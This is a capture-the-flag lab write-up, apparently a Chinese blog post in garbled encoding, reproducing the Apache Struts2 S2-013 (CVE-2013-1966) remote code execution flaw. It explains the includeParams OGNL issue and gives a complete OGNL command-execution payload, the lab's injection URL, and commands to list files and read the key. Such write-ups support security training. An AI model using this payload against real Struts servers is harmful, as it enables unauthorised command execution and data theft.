墨者學(xué)院-Apache Struts2遠(yuǎn)程代碼執(zhí)行漏洞(S2-013)復(fù)現(xiàn)

靶場(chǎng)地址:

https://www.mozhe.cn/bug/detail/S0NiS2JMeTZUTVg3RXdMYzdqWTBQUT09bW96aGUmozhe

漏洞編號(hào):CVE-2013-1966

影響范圍:Struts 2.0.0 - Struts 2.3.14

漏洞原理:s:url和s:a標(biāo)記都提供includeparams屬性。

該屬性的主要作用域是了解包含或不包含http://request參數(shù)的內(nèi)容。

INCLUDEParams的允許值為:

none-在URL中不包含任何參數(shù)(默認(rèn))

get-僅在URL中包含get參數(shù)

all-在URL中同時(shí)包含get和post參數(shù)

當(dāng)INCLUDEParams被賦予了以上參數(shù),struts會(huì)進(jìn)行OGNL解析

任意命令執(zhí)行Exp:

${#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('[命令]').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(+new java.lang.String(#d)),#out.close()}

構(gòu)造需要的命令進(jìn)行url編碼,添加到http://219.153.49.228:45210/?a=[exp]

執(zhí)行l(wèi)s \命令:


返回目錄

執(zhí)行cat /key.txt命令:


獲得key
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容